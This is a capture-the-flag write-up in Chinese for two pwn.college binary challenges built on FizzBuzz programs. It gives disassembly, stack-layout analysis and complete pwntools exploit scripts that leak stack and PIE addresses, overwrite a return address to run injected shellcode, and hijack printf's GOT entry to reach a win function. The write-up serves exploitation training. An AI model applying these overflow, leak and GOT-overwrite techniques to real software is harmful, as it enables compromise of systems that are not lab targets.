│    ││╎│   ; CODE XREF from sym.challenge @ 0x1294(x)
│    │└───> 0x000012a6      8b4dec         mov ecx, dword [var_14h]
│    │ ╎│   0x000012a9      4863c1         movsxd rax, ecx
│    │ ╎│   0x000012ac      4869c05655..   imul rax, rax, 0x55555556
│    │ ╎│   0x000012b3      48c1e820       shr rax, 0x20
│    │ ╎│   0x000012b7      4889c2         mov rdx, rax
│    │ ╎│   0x000012ba      89c8           mov eax, ecx
│    │ ╎│   0x000012bc      c1f81f         sar eax, 0x1f
│    │ ╎│   0x000012bf      89d6           mov esi, edx
│    │ ╎│   0x000012c1      29c6           sub esi, eax
│    │ ╎│   0x000012c3      89f0           mov eax, esi
│    │ ╎│   0x000012c5      89c2           mov edx, eax
│    │ ╎│   0x000012c7      01d2           add edx, edx
│    │ ╎│   0x000012c9      01c2           add edx, eax
│    │ ╎│   0x000012cb      89c8           mov eax, ecx
│    │ ╎│   0x000012cd      29d0           sub eax, edx
│    │ ╎│   0x000012cf      85c0           test eax, eax
│    │┌───< 0x000012d1      750d           jne 0x12e0
│    ││╎│   0x000012d3      488d05362d..   lea rax, obj.fizz           ; 0x4010 ; "Fizz\n"
│    ││╎│   0x000012da      488945f0       mov qword [src], rax
│   ┌─────< 0x000012de      eb46           jmp 0x1326
│   │││╎│   ; CODE XREF from sym.challenge @ 0x12d1(x)
│   ││└───> 0x000012e0      8b4dec         mov ecx, dword [var_14h]
│   ││ ╎│   0x000012e3      4863c1         movsxd rax, ecx
│   ││ ╎│   0x000012e6      4869c06766..   imul rax, rax, 0x66666667
│   ││ ╎│   0x000012ed      48c1e820       shr rax, 0x20
│   ││ ╎│   0x000012f1      89c2           mov edx, eax
│   ││ ╎│   0x000012f3      d1fa           sar edx, 1
│   ││ ╎│   0x000012f5      89c8           mov eax, ecx
│   ││ ╎│   0x000012f7      c1f81f         sar eax, 0x1f
│   ││ ╎│   0x000012fa      29c2           sub edx, eax
│   ││ ╎│   0x000012fc      89d0           mov eax, edx
│   ││ ╎│   0x000012fe      89c2           mov edx, eax
│   ││ ╎│   0x00001300      c1e202         shl edx, 2
│   ││ ╎│   0x00001303      01c2           add edx, eax
│   ││ ╎│   0x00001305      89c8           mov eax, ecx
│   ││ ╎│   0x00001307      29d0           sub eax, edx
│   ││ ╎│   0x00001309      85c0           test eax, eax
│   ││┌───< 0x0000130b      750e           jne 0x131b
│   │││╎│   0x0000130d      488d45a0       lea rax, [buf]
│   │││╎│   0x00001311      4883c044       add rax, 0x44
│   │││╎│   0x00001315      488945f0       mov qword [src], rax
│  ┌──────< 0x00001319      eb0b           jmp 0x1326
│  ││││╎│   ; CODE XREF from sym.challenge @ 0x130b(x)
│  │││└───> 0x0000131b      488d05fe2c..   lea rax, obj.nothing        ; 0x4020 ; "\n"
│  │││ ╎│   0x00001322      488945f0       mov qword [src], rax
│  │││ ╎│   ; CODE XREFS from sym.challenge @ 0x12a1(x), 0x12de(x), 0x1319(x)
│  └└└────> 0x00001326      8b45ec         mov eax, dword [var_14h]
│      ╎│   0x00001329      89c6           mov esi, eax
│      ╎│   0x0000132b      488d3de80c..   lea rdi, str._d:            ; 0x201a ; "%d: " ; const char *format
│      ╎│   0x00001332      b800000000     mov eax, 0
│      ╎│   0x00001337      e894fdffff     call sym.imp.printf         ; int printf(const char *format)

│      ╎│   0x0000133c      488d45a0       lea rax, [buf]
│      ╎│   0x00001340      4883c014       add rax, 0x14    ; buf + 0x14 = rbp - 0x4c
│      ╎│   0x00001344      baf8000000     mov edx, 0xf8    ; size_t nbyte = 248
│      ╎│   0x00001349      4889c6         mov rsi, rax     ; buf = rbp - 0x4c
│      ╎│   0x0000134c      bf00000000     mov edi, 0       ; fd = stdin
│      ╎│   0x00001351      e8eafdffff     call sym.imp.read

│      ╎│   0x00001356      488d45a0       lea rax, [buf]
│      ╎│   0x0000135a      4883c014       add rax, 0x14
│      ╎│   0x0000135e      4889c6         mov rsi, rax
│      ╎│   0x00001361      488d3db70c..   lea rdi, str.You_entered:__s_n ; 0x201f ; "You entered: %s\n" ; const char *format
│      ╎│   0x00001368      b800000000     mov eax, 0
│      ╎│   0x0000136d      e85efdffff     call sym.imp.printf         ; int printf(const char *format)
│      ╎│   0x00001372      c645b400       mov byte [var_4ch], 0
│      ╎│   0x00001376      488b55f0       mov rdx, qword [src]
│      ╎│   0x0000137a      488b45f8       mov rax, qword [dest]
│      ╎│   0x0000137e      4889d6         mov rsi, rdx                ; const char *src
│      ╎│   0x00001381      4889c7         mov rdi, rax                ; char *dest
# strcpy check the src and dest in stack
│      ╎│   0x00001384      e827fdffff     call sym.imp.strcpy         ; char *strcpy(char *dest, const char *src)
│      ╎│   0x00001389      488b45f8       mov rax, qword [dest]
│      ╎│   0x0000138d      4889c6         mov rsi, rax
│      ╎│   0x00001390      488d3d990c..   lea rdi, str.Correct_answer:__s_n ; 0x2030 ; "Correct answer: %s\n" ; const char *format
│      ╎│   0x00001397      b800000000     mov eax, 0
│      ╎│   0x0000139c      e82ffdffff     call sym.imp.printf         ; int printf(const char *format)
│      ╎│   0x000013a1      8b45ec         mov eax, dword [var_14h]
│      ╎│   0x000013a4      83c001         add eax, 1
│      ╎│   0x000013a7      8945ec         mov dword [var_14h], eax
│      ╎│   ; CODE XREF from sym.challenge @ 0x1261(x)
# loop counter rbp - 0x14 compares buf
│      ╎└─> 0x000013aa      8b55ec         mov edx, dword [var_14h]
│      ╎    0x000013ad      8b45a0         mov eax, dword [buf]
│      ╎    0x000013b0      39c2           cmp edx, eax
│      └──< 0x000013b2      0f8caefeffff   jl 0x1266

│           0x000013b8      90             nop
│           0x000013b9      c9             leave
└           0x000013ba      c3             ret

0x0000126c      imul rax, rax, 0xffffffff88888889
...
0x000012ac      imul rax, rax, 0x55555556
...
0x000012e6      imul rax, rax, 0x66666667

• % 15 == 0 (0x88888889 乘法逆元) -> 对应 FizzBuzz\n
• % 3 == 0 (0x55555556 乘法逆元) -> 对应 Fizz\n
• % 5 == 0 (0x66666667 乘法逆元) -> 对应 buf + 0x44 (即事先写好的 "Buzz")
• 都不满足 -> 对应 \n

# check buf?
from pwn import *

context.terminal = ["tmux", "splitw", "-h"]
context.arch = "amd64"

p = gdb.debug(
    "/challenge/can-it-fizz",
    env={"SHELL": "/bin/bash"},
    gdbscript="""
b * challenge+360
continue
ni
""",
)
p.sendline(b"1")

# buf to rbp
p.send(cyclic(74))
p.interactive()

• [buf] 位于 rbp - 0x60
• 输入起点 buf + 0x14 = rbp - 0x4c
• 循环计数器 var_14h = rbp - 0x14
• 源字符串指针 src = rbp - 0x10
• 目标字符串指针 dest = rbp - 0x8
• Saved RBP = rbp
• Saved RIP (Return Address) = rbp + 0x8

从输入起点 (rbp - 0x4c) 到循环计数器 (rbp - 0x14)，距离正好是 0x4c - 0x14 = 0x38，56 bytes

#!/usr/bin/env python3
from pwn import *

context.arch = "amd64"
context.log_level = "info"


def exploit():
    p = process("/challenge/can-it-fizz")

    # 推进到第 5 次循环 (var_14h == 5) 以触发 Buzz
    # 此时 src 将被指向 buf+0x44
    for i in range(6):
        p.recvuntil(f"{i}: ".encode())
        if i < 5:
            p.send(b"A")

    # 56 bytes padding + 覆盖 var_14h 为 -1 (\xff\xff\xff\xff)
    # 这样没有 null byte 截断，printf 会一直打印出后面的 src 指针
    # 同时 -1 + 1 = 0，0 < 16，循环会继续，不会退出。
    payload_leak_stack = b"A" * 56 + b"\xff\xff\xff\xff"
    p.send(payload_leak_stack)

    p.recvuntil(b"You entered: " + payload_leak_stack)
    stack_leak = u64(p.recv(6).ljust(8, b"\x00"))

    buf_addr = stack_leak - 0x44
    rbp_addr = buf_addr + 0x60
    log.info(f"[+] Stack Leaked! buf address: {hex(buf_addr)}")

    # 此时 var_14h 变回 0，触发 FizzBuzz，src 指向只读数据段 (PIE)
    p.recvuntil(b"0: ")

    payload_leak_pie = b"A" * 56 + b"\xff\xff\xff\xff"
    p.send(payload_leak_pie)

    p.recvuntil(b"You entered: " + payload_leak_pie)
    pie_leak = u64(p.recv(6).ljust(8, b"\x00"))
    pie_base = pie_leak - 0x4018
    log.info(f"[+] PIE Leaked! base address: {hex(pie_base)}")

    p.recvuntil(b"0: ")

    dest_addr = rbp_addr - 0x200  # 在栈上找个安全区让 strcpy 复制
    src_addr = pie_base + 0x4018  # 填入一个合法的只读地址，防止 strcpy 触发 SIGSEGV
    shellcode_addr = rbp_addr + 16  # ret 之后的地址

    # 构造完美内存布局
    payload = flat(
        {
            0: b"A" * 56,
            56: p32(16),  # var_14h 设为 16，循环自增变 17
            60: p64(src_addr),  # 修复 src
            68: p64(dest_addr),  # 修复 dest
            76: p64(rbp_addr),  # 填入原始 rbp
            84: p64(shellcode_addr),  # 劫持 ret
            92: asm(shellcraft.cat("/flag")),
        }
    )

    p.send(payload)
    p.interactive()


if __name__ == "__main__":
    exploit()

1. 利用 Buzz 泄露栈地址

# 推进到第 5 次循环 (var_14h == 5)
for i in range(6):
    p.recvuntil(f"{i}: ".encode())
    if i < 5:
        p.send(b"A")

程序内置了 FizzBuzz 逻辑。当 var_14h == 5 时，满足 % 5 == 0，触发 Buzz 分支。此时，二进制文件会将 src 指针指向 buf + 0x44（这里提前写入了 "Buzz"）。

payload_leak_stack = b"A" * 56 + b"\xff\xff\xff\xff"
p.send(payload_leak_stack)

1. 填充 56 字节的 A，恰好抵达 var_14h。
2. 用 \xff\xff\xff\xff (-1) 覆盖 var_14h。
3. read() 函数不会自动补 \x00（Null byte），而 printf("You entered: %s") 遇到 \x00 才会停。
4. 因为我们把 var_14h 变成了非零的 -1，printf 会顺着读下去，直接把紧贴在它后面的 src 指针（位于 rbp - 0x10）给打印出来！
5. 同时，由于 -1 + 1 = 0，循环变量更新后变成了 0，满足 0 < 16，程序继续下一次循环，不会崩溃。

2. 利用 FizzBuzz 泄露程序基址

payload_leak_pie = b"A" * 56 + b"\xff\xff\xff\xff"

因为上一步把计数器改成了 -1，这一轮循环加一后 var_14h 变成了 0。 0 % 15 == 0，所以这一轮触发的是 FizzBuzz 分支。 此时，程序会将 src 指向只读数据段（.rodata）中的 "FizzBuzz\n" 字符串（地址为 PIE 偏移 0x4018）。

再次用 56 字节 + -1 覆盖，把此时的 src 指针打印出来。减去偏移 0x4018，就拿到了程序的真实基址（pie_base）

3. Code Execution

到了这一步，我们手里有栈的绝对地址（用来放 Shellcode），也有 PIE 基址。

dest_addr = rbp_addr - 0x200
src_addr = pie_base + 0x4018
shellcode_addr = rbp_addr + 16

你可能会问，既然可以直接覆盖 RIP，为什么还要搞这么复杂的 payload，修复 src 和 dest 回去看反汇编，在 printf 之后，程序执行了一个操作： call sym.imp.strcpy (把 src 复制到 dest)

如果只是用垃圾数据往后覆盖，把 src 和 dest 覆写成了无效地址（比如全 A），strcpy 就会触发 SIGSEGV (段错误)

• 56: p32(16): 把循环计数器改成 16。等这一轮结束 16 + 1 = 17，不满足 < 16 的条件，程序会立刻跳出循环，执行 leave; ret。
• 60: p64(src_addr): 填入刚泄露的有效可读地址（只读段的 "FizzBuzz"）。
• 68: p64(dest_addr): 填入栈上一个远离我们 shellcode 的空闲区（rbp_addr - 0x200）
• 76: p64(rbp_addr): 还原 RBP。
• 84: p64(shellcode_addr): 将 Saved RIP 劫持为栈上的 Shellcode 地址。
• 92: asm(...): 注入 shellcode。

pwn.college{********************************************}

Does It Buzz?

hacker@program-security~does-it-buzz:~$ r2 -A -q -c "pdf @ sym.challenge; pdf @ sym.win" /challenge/does-it-buzz
┌ 507: sym.challenge (char **arg1, char **arg2, int64_t arg3);
│ `- args(rdi, rsi, rdx) vars(9:sp[0x10..0x90])
│           0x000013d0      f30f1efa       endbr64
│           0x000013d4      55             push rbp
│           0x000013d5      4889e5         mov rbp, rsp
│           0x000013d8      4881ec9000..   sub rsp, 0x90
│           0x000013df      897d8c         mov dword [var_74h], edi    ; arg1
│           0x000013e2      48897580       mov qword [var_80h], rsi    ; arg2
│           0x000013e6      48899578ff..   mov qword [var_88h], rdx    ; arg3
│           0x000013ed      64488b0425..   mov rax, qword fs:[0x28]
│           0x000013f6      488945f8       mov qword [canary], rax
│           0x000013fa      31c0           xor eax, eax
│           0x000013fc      488d5590       lea rdx, [buf]
│           0x00001400      b800000000     mov eax, 0
│           0x00001405      b90c000000     mov ecx, 0xc
│           0x0000140a      4889d7         mov rdi, rdx
│           0x0000140d      f348ab         rep stosq qword [rdi], rax
│           0x00001410      488d4590       lea rax, [buf]
│           0x00001414      4883c004       add rax, 4
│           0x00001418      488945e8       mov qword [dest], rax
│           0x0000141c      488d4590       lea rax, [buf]
│           0x00001420      4883c014       add rax, 0x14
│           0x00001424      488945e0       mov qword [src], rax
│           0x00001428      c745dc0000..   mov dword [var_24h], 0
│           0x0000142f      c745901000..   mov dword [buf], 0x10
│           0x00001436      488d4590       lea rax, [buf]
│           0x0000143a      4883c044       add rax, 0x44
│           0x0000143e      c70042757a7a   mov dword [rax], 0x7a7a7542 ; 'Buzz'
│                                                                      ; [0x7a7a7542:4]=-1
│           0x00001444      66c740040a00   mov word [rax + 4], 0xa
│           0x0000144a      488d3dbb0c..   lea rdi, str.Welcome_to_Fizz_Buzz_ ; 0x210c ; "Welcome to Fizz Buzz!" ; const char *s
│           0x00001451      e8eafcffff     call sym.imp.puts           ; int puts(const char *s)
│           0x00001456      c745dc0000..   mov dword [var_24h], 0
│       ┌─< 0x0000145d      e944010000     jmp 0x15a6
│       │   ; CODE XREF from sym.challenge @ 0x15ae(x)
│      ┌──> 0x00001462      8b55dc         mov edx, dword [var_24h]
│      ╎│   0x00001465      4863c2         movsxd rax, edx
│      ╎│   0x00001468      4869c08988..   imul rax, rax, 0xffffffff88888889
│      ╎│   0x0000146f      48c1e820       shr rax, 0x20
│      ╎│   0x00001473      01d0           add eax, edx
│      ╎│   0x00001475      c1f803         sar eax, 3
│      ╎│   0x00001478      89c1           mov ecx, eax
│      ╎│   0x0000147a      89d0           mov eax, edx
│      ╎│   0x0000147c      c1f81f         sar eax, 0x1f
│      ╎│   0x0000147f      29c1           sub ecx, eax
│      ╎│   0x00001481      89c8           mov eax, ecx
│      ╎│   0x00001483      89c1           mov ecx, eax
│      ╎│   0x00001485      c1e104         shl ecx, 4
│      ╎│   0x00001488      29c1           sub ecx, eax
│      ╎│   0x0000148a      89d0           mov eax, edx
│      ╎│   0x0000148c      29c8           sub eax, ecx
│      ╎│   0x0000148e      85c0           test eax, eax
│     ┌───< 0x00001490      7510           jne 0x14a2
│     │╎│   0x00001492      488d05ff2b..   lea rax, obj.fuzzbuzz       ; 0x4098 ; "FizzBuzz\n"
│     │╎│   0x00001499      488945e0       mov qword [src], rax
│    ┌────< 0x0000149d      e980000000     jmp 0x1522
│    ││╎│   ; CODE XREF from sym.challenge @ 0x1490(x)
│    │└───> 0x000014a2      8b4ddc         mov ecx, dword [var_24h]
│    │ ╎│   0x000014a5      4863c1         movsxd rax, ecx
│    │ ╎│   0x000014a8      4869c05655..   imul rax, rax, 0x55555556
│    │ ╎│   0x000014af      48c1e820       shr rax, 0x20
│    │ ╎│   0x000014b3      4889c2         mov rdx, rax
│    │ ╎│   0x000014b6      89c8           mov eax, ecx
│    │ ╎│   0x000014b8      c1f81f         sar eax, 0x1f
│    │ ╎│   0x000014bb      89d6           mov esi, edx
│    │ ╎│   0x000014bd      29c6           sub esi, eax
│    │ ╎│   0x000014bf      89f0           mov eax, esi
│    │ ╎│   0x000014c1      89c2           mov edx, eax
│    │ ╎│   0x000014c3      01d2           add edx, edx
│    │ ╎│   0x000014c5      01c2           add edx, eax
│    │ ╎│   0x000014c7      89c8           mov eax, ecx
│    │ ╎│   0x000014c9      29d0           sub eax, edx
│    │ ╎│   0x000014cb      85c0           test eax, eax
│    │┌───< 0x000014cd      750d           jne 0x14dc
│    ││╎│   0x000014cf      488d05ba2b..   lea rax, obj.fizz           ; 0x4090 ; "Fizz\n"
│    ││╎│   0x000014d6      488945e0       mov qword [src], rax
│   ┌─────< 0x000014da      eb46           jmp 0x1522
│   │││╎│   ; CODE XREF from sym.challenge @ 0x14cd(x)
│   ││└───> 0x000014dc      8b4ddc         mov ecx, dword [var_24h]
│   ││ ╎│   0x000014df      4863c1         movsxd rax, ecx
│   ││ ╎│   0x000014e2      4869c06766..   imul rax, rax, 0x66666667
│   ││ ╎│   0x000014e9      48c1e820       shr rax, 0x20
│   ││ ╎│   0x000014ed      89c2           mov edx, eax
│   ││ ╎│   0x000014ef      d1fa           sar edx, 1
│   ││ ╎│   0x000014f1      89c8           mov eax, ecx
│   ││ ╎│   0x000014f3      c1f81f         sar eax, 0x1f
│   ││ ╎│   0x000014f6      29c2           sub edx, eax
│   ││ ╎│   0x000014f8      89d0           mov eax, edx
│   ││ ╎│   0x000014fa      89c2           mov edx, eax
│   ││ ╎│   0x000014fc      c1e202         shl edx, 2
│   ││ ╎│   0x000014ff      01c2           add edx, eax
│   ││ ╎│   0x00001501      89c8           mov eax, ecx
│   ││ ╎│   0x00001503      29d0           sub eax, edx
│   ││ ╎│   0x00001505      85c0           test eax, eax
│   ││┌───< 0x00001507      750e           jne 0x1517
│   │││╎│   0x00001509      488d4590       lea rax, [buf]
│   │││╎│   0x0000150d      4883c044       add rax, 0x44
│   │││╎│   0x00001511      488945e0       mov qword [src], rax
│  ┌──────< 0x00001515      eb0b           jmp 0x1522
│  ││││╎│   ; CODE XREF from sym.challenge @ 0x1507(x)
│  │││└───> 0x00001517      488d05822b..   lea rax, obj.nothing        ; 0x40a0 ; "\n"
│  │││ ╎│   0x0000151e      488945e0       mov qword [src], rax
│  │││ ╎│   ; CODE XREFS from sym.challenge @ 0x149d(x), 0x14da(x), 0x1515(x)
│  └└└────> 0x00001522      8b45dc         mov eax, dword [var_24h]
│      ╎│   0x00001525      89c6           mov esi, eax
│      ╎│   0x00001527      488d3df40b..   lea rdi, str._d:            ; 0x2122 ; "%d: " ; const char *format
│      ╎│   0x0000152e      b800000000     mov eax, 0
│      ╎│   0x00001533      e838fcffff     call sym.imp.printf         ; int printf(const char *format)
│      ╎│   0x00001538      488d4590       lea rax, [buf]
│      ╎│   0x0000153c      4883c014       add rax, 0x14
│      ╎│   0x00001540      ba50000000     mov edx, 0x50               ; 'P' ; size_t nbyte
│      ╎│   0x00001545      4889c6         mov rsi, rax                ; void *buf
│      ╎│   0x00001548      bf00000000     mov edi, 0                  ; int fildes
│      ╎│   0x0000154d      e83efcffff     call sym.imp.read           ; ssize_t read(int fildes, void *buf, size_t nbyte)
│      ╎│   0x00001552      488d4590       lea rax, [buf]
│      ╎│   0x00001556      4883c014       add rax, 0x14
│      ╎│   0x0000155a      4889c6         mov rsi, rax
│      ╎│   0x0000155d      488d3dc30b..   lea rdi, str.You_entered:__s_n ; 0x2127 ; "You entered: %s\n" ; const char *format
│      ╎│   0x00001564      b800000000     mov eax, 0
│      ╎│   0x00001569      e802fcffff     call sym.imp.printf         ; int printf(const char *format)
# 强制把输入的第一个字节变成了 \x00 (Null Byte)
│      ╎│   0x0000156e      c645a400       mov byte [var_5ch], 0
│      ╎│   0x00001572      488b55e0       mov rdx, qword [src]
│      ╎│   0x00001576      488b45e8       mov rax, qword [dest]
│      ╎│   0x0000157a      4889d6         mov rsi, rdx                ; const char *src
│      ╎│   0x0000157d      4889c7         mov rdi, rax                ; char *dest
│      ╎│   0x00001580      e8abfbffff     call sym.imp.strcpy         ; char *strcpy(char *dest, const char *src)
│      ╎│   0x00001585      488b45e8       mov rax, qword [dest]
│      ╎│   0x00001589      4889c6         mov rsi, rax
│      ╎│   0x0000158c      488d3da50b..   lea rdi, str.Correct_answer:__s_n ; 0x2138 ; "Correct answer: %s\n" ; const char *format
│      ╎│   0x00001593      b800000000     mov eax, 0
│      ╎│   0x00001598      e8d3fbffff     call sym.imp.printf         ; int printf(const char *format)
│      ╎│   0x0000159d      8b45dc         mov eax, dword [var_24h]
│      ╎│   0x000015a0      83c001         add eax, 1
│      ╎│   0x000015a3      8945dc         mov dword [var_24h], eax
│      ╎│   ; CODE XREF from sym.challenge @ 0x145d(x)
│      ╎└─> 0x000015a6      8b55dc         mov edx, dword [var_24h]
│      ╎    0x000015a9      8b4590         mov eax, dword [buf]
│      ╎    0x000015ac      39c2           cmp edx, eax
│      └──< 0x000015ae      0f8caefeffff   jl 0x1462
│           0x000015b4      90             nop
│           0x000015b5      488b75f8       mov rsi, qword [canary]
│           0x000015b9      6448333425..   xor rsi, qword fs:[0x28]
│       ┌─< 0x000015c2      7405           je 0x15c9
│       │   0x000015c4      e897fbffff     call sym.imp.__stack_chk_fail ; void __stack_chk_fail(void)
│       │   ; CODE XREF from sym.challenge @ 0x15c2(x)
│       └─> 0x000015c9      c9             leave
└           0x000015ca      c3             ret
┌ 263: sym.win ();
│           0x000012c9      f30f1efa       endbr64
│           0x000012cd      55             push rbp
│           0x000012ce      4889e5         mov rbp, rsp
│           0x000012d1      488d3d300d..   lea rdi, str.You_win__Here_is_your_flag: ; 0x2008 ; "You win! Here is your flag:" ; const char *s
│           0x000012d8      e863feffff     call sym.imp.puts           ; int puts(const char *s)
│           0x000012dd      be00000000     mov esi, 0                  ; int oflag
│           0x000012e2      488d3d3b0d..   lea rdi, str._flag          ; 0x2024 ; "/flag" ; const char *path
│           0x000012e9      b800000000     mov eax, 0
│           0x000012ee      e8bdfeffff     call sym.imp.open           ; int open(const char *path, int oflag)
│           0x000012f3      8905e72d0000   mov dword [obj.flag_fd.5698], eax ; [0x40e0:4]=0
│           0x000012f9      8b05e12d0000   mov eax, dword [obj.flag_fd.5698] ; [0x40e0:4]=0
│           0x000012ff      85c0           test eax, eax
│       ┌─< 0x00001301      794d           jns 0x1350
│       │   0x00001303      e818feffff     call sym.imp.__errno_location
│       │   0x00001308      8b00           mov eax, dword [rax]
│       │   0x0000130a      89c7           mov edi, eax                ; int errnum
│       │   0x0000130c      e8bffeffff     call sym.imp.strerror       ; char *strerror(int errnum)
│       │   0x00001311      4889c6         mov rsi, rax
│       │   0x00001314      488d3d150d..   lea rdi, str._n__ERROR:_Failed_to_open_the_flag_____s__n ; 0x2030 ; "\n  ERROR: Failed to open the flag -- %s!\n" ; const char *format
│       │   0x0000131b      b800000000     mov eax, 0
│       │   0x00001320      e84bfeffff     call sym.imp.printf         ; int printf(const char *format)
│       │   0x00001325      e856feffff     call sym.imp.geteuid        ; uid_t geteuid(void)
│       │   0x0000132a      85c0           test eax, eax
│      ┌──< 0x0000132c      7418           je 0x1346
│      ││   0x0000132e      488d3d2b0d..   lea rdi, str.__Your_effective_user_id_is_not_0_ ; 0x2060 ; "  Your effective user id is not 0!" ; const char *s
│      ││   0x00001335      e806feffff     call sym.imp.puts           ; int puts(const char *s)
│      ││   0x0000133a      488d3d470d..   lea rdi, str.__You_must_directly_run_the_suid_binary_in_order_to_have_the_correct_permissions_ ; 0x2088 ; "  You must directly run the suid binary in order to have the correct permissions!" ; const char *s
│      ││   0x00001341      e8fafdffff     call sym.imp.puts           ; int puts(const char *s)
│      ││   ; CODE XREF from sym.win @ 0x132c(x)
│      └──> 0x00001346      bfffffffff     mov edi, 0xffffffff         ; -1 ; int status
│       │   0x0000134b      e870feffff     call sym.imp.exit           ; void exit(int status)
│       │   ; CODE XREF from sym.win @ 0x1301(x)
│       └─> 0x00001350      8b058a2d0000   mov eax, dword [obj.flag_fd.5698] ; [0x40e0:4]=0
│           0x00001356      ba00010000     mov edx, 0x100              ; size_t nbyte
│           0x0000135b      488d359e2d..   lea rsi, obj.flag.5697      ; 0x4100 ; void *buf
│           0x00001362      89c7           mov edi, eax                ; int fildes
│           0x00001364      e827feffff     call sym.imp.read           ; ssize_t read(int fildes, void *buf, size_t nbyte)
│           0x00001369      8905912e0000   mov dword [obj.flag_length.5699], eax ; [0x4200:4]=0
│           0x0000136f      8b058b2e0000   mov eax, dword [obj.flag_length.5699] ; [0x4200:4]=0
│           0x00001375      85c0           test eax, eax
│       ┌─< 0x00001377      7f2c           jg 0x13a5
│       │   0x00001379      e8a2fdffff     call sym.imp.__errno_location
│       │   0x0000137e      8b00           mov eax, dword [rax]
│       │   0x00001380      89c7           mov edi, eax                ; int errnum
│       │   0x00001382      e849feffff     call sym.imp.strerror       ; char *strerror(int errnum)
│       │   0x00001387      4889c6         mov rsi, rax
│       │   0x0000138a      488d3d4f0d..   lea rdi, str._n__ERROR:_Failed_to_read_the_flag_____s__n ; 0x20e0 ; "\n  ERROR: Failed to read the flag -- %s!\n" ; const char *format
│       │   0x00001391      b800000000     mov eax, 0
│       │   0x00001396      e8d5fdffff     call sym.imp.printf         ; int printf(const char *format)
│       │   0x0000139b      bfffffffff     mov edi, 0xffffffff         ; -1 ; int status
│       │   0x000013a0      e81bfeffff     call sym.imp.exit           ; void exit(int status)
│       │   ; CODE XREF from sym.win @ 0x1377(x)
│       └─> 0x000013a5      8b05552e0000   mov eax, dword [obj.flag_length.5699] ; [0x4200:4]=0
│           0x000013ab      4898           cdqe
│           0x000013ad      4889c2         mov rdx, rax                ; size_t nbytes
│           0x000013b0      488d35492d..   lea rsi, obj.flag.5697      ; 0x4100 ; const char *ptr
│           0x000013b7      bf01000000     mov edi, 1                  ; int fd
│           0x000013bc      e88ffdffff     call sym.imp.write          ; ssize_t write(int fd, const char *ptr, size_t nbytes)
│           0x000013c1      488d3d420d..   lea rdi, [0x0000210a]       ; "\n" ; const char *s
│           0x000013c8      e873fdffff     call sym.imp.puts           ; int puts(const char *s)
│           0x000013cd      90             nop
│           0x000013ce      5d             pop rbp
└           0x000013cf      c3             ret

仔细看汇编里的栈分配和 read() 调用：

• 0x000013d8 sub rsp, 0x90：开辟了 144 字节空间。
• canary 位于 rbp - 0x8。
• var_24h (循环计数器) 位于 rbp - 0x24。
• src 指针位于 rbp - 0x20。
• dest 指针位于 rbp - 0x18。
• read() 的输入起点在 buf + 0x14，通过计算可以得出它位于 rbp - 0x5c。

最关键的变化在 read() 的参数：

0x00001540  mov edx, 0x50  ; size_t nbyte = 80

现在的缓冲区溢出最多只能写 80 个字节。 buffer address (rbp - 0x5c) 到 Canary (rbp - 0x8) 的距离是 0x5c - 0x8 = 0x54 (84 字节)。

最多只能写到 rbp - 0xc。

既然碰不到返回地址 (rbp + 0x8)，我们怎么劫持控制流？破局点在于覆盖的局部变量： 距离起点 60 字节的地方是 src，68 字节的地方是 dest。这两个指针完全在 80 字节范围内。

hacker@program-security~does-it-buzz:~$ checksec /challenge/does-it-buzz
[*] '/challenge/does-it-buzz'
    Arch:       amd64-64-little
    RELRO:      Partial RELRO
    Stack:      Canary found
    NX:         NX enabled
    PIE:        PIE enabled
    SHSTK:      Enabled
    IBT:        Enabled
    Stripped:   No

• SHSTK: Enabled (Hardware Shadow Stack / 硬件影子栈)
• IBT: Enabled (Indirect Branch Tracking / 间接分支追踪)

当我们用 strcpy 把后门地址写进 saved_rip 后，函数走到最后执行 ret 指令。 现代系统里，CPU 内部维护了一个只有硬件能访问的影子栈 (Shadow Stack)。当你执行 call 时，返回地址会同时压入普通栈和影子栈；当你执行 ret 时，CPU 会把普通栈上的地址和影子栈里的地址做对比。对比失败 CPU 硬件直接抛出 Control Protection Exception (#CP)

• RELRO: Partial RELRO

Partial RELRO 意味着全局偏移表 (GOT) 是可写的 看一下 strcpy 之后程序干了什么：

0x00001580      call sym.imp.strcpy        ; 我们控制的任意写入
0x00001585      mov rax, qword [dest]
0x00001589      mov rsi, rax
0x0000158c      lea rdi, str.Correct_answer:__s_n
0x00001598      call sym.imp.printf        ; 调用了 printf

如果我们在 strcpy 的时候，把目标地址 (dest) 设置为 printf 的 GOT 表地址，把写入内容设为 sym.win，那么下一条指令 call printf 就会直接跳进 win 函数

#!/usr/bin/env python3
from pwn import *

context.arch = "amd64"
context.log_level = "info"

def exploit():
    elf = ELF("/challenge/does-it-buzz")
    p = process(elf.path)

    # 推进到第 5 次循环 (var_24h == 5)
    for i in range(6):
        p.recvuntil(f"{i}: ".encode())
        if i < 5:
            p.send(b"A")

    # --- 阶段一：Stack Leak ---
    payload_leak_stack = b"A" * 56 + b"\xff\xff\xff\xff"
    p.send(payload_leak_stack)
    p.recvuntil(b"You entered: " + payload_leak_stack)
    stack_leak = u64(p.recv(6).ljust(8, b"\x00"))

    buf_addr = stack_leak - 0x44
    log.info(f"[+] Stack Leaked! buf address: {hex(buf_addr)}")

    # --- 阶段二：PIE Leak ---
    p.recvuntil(b"0: ")
    payload_leak_pie = b"A" * 56 + b"\xff\xff\xff\xff"
    p.send(payload_leak_pie)
    p.recvuntil(b"You entered: " + payload_leak_pie)
    pie_leak = u64(p.recv(6).ljust(8, b"\x00"))

    pie_base = pie_leak - 0x4098
    elf.address = pie_base  # 直接更新 ELF 基址，让 pwntools 算偏移
    log.info(f"[+] PIE Leaked! base address: {hex(pie_base)}")

    # --- 阶段三： GOT 劫持 ---
    p.recvuntil(b"0: ")

    sym_win = elf.sym['win']         # 直接读取后门函数地址
    printf_got = elf.got['printf']   # 直接读取 printf 的 GOT 表地址
    src_addr = buf_addr + 0x15       # 错位一个字节，躲避强制清零机制

    payload = b"X" + p64(sym_win)      # X 会被清零()，保留完整的 p64 地址
    payload = payload.ljust(56, b"A")  # Padding
    payload += p32(16)                 # 56: var_24h
    payload += p64(src_addr)           # 60: 劫持 src
    payload += p64(printf_got)         # 68: 劫持 dest 指向 GOT 表！

    p.send(payload)
    p.interactive()

if __name__ == "__main__":
    exploit()

hacker@program-security~does-it-buzz:~$ python a.py
[*] '/challenge/does-it-buzz'
    Arch:       amd64-64-little
    RELRO:      Partial RELRO
    Stack:      Canary found
    NX:         NX enabled
    PIE:        PIE enabled
    SHSTK:      Enabled
    IBT:        Enabled
    Stripped:   No
[+] Starting local process '/challenge/does-it-buzz': pid 209
